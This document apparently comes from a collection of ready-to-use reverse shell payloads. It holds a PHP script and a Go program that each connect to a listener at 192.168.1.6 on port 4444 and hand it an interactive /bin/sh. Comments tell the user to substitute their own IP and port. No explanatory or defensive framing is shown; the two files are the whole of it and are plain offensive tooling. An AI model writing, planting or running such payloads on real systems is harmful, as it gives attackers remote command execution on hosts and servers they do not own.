File: linux/php/reverse.php
<?php
$ip = '192.168.1.6';  // Replace with your IP
$port = 4444;         // Replace with your port

$sock = fsockopen($ip, $port);
$proc = proc_open("/bin/sh -i", [
    0 => $sock,  // stdin
    1 => $sock,  // stdout
    2 => $sock   // stderr
], $pipes);
?>

File: linux/go/reverse.go
package main

import (
    "net"
    "os/exec"
)

func main() {
    conn, err := net.Dial("tcp", "192.168.1.6:4444") // Replace accordingly
    if err != nil {
        return
    }
    defer conn.Close()

    // Create a shell command
    cmd := exec.Command("/bin/sh", "-i")

    // Connect shell's stdin, stdout, stderr to the network connection
    cmd.Stdin = conn
    cmd.Stdout = conn
    cmd.Stderr = conn

    // Start the shell
    cmd.Run()
}
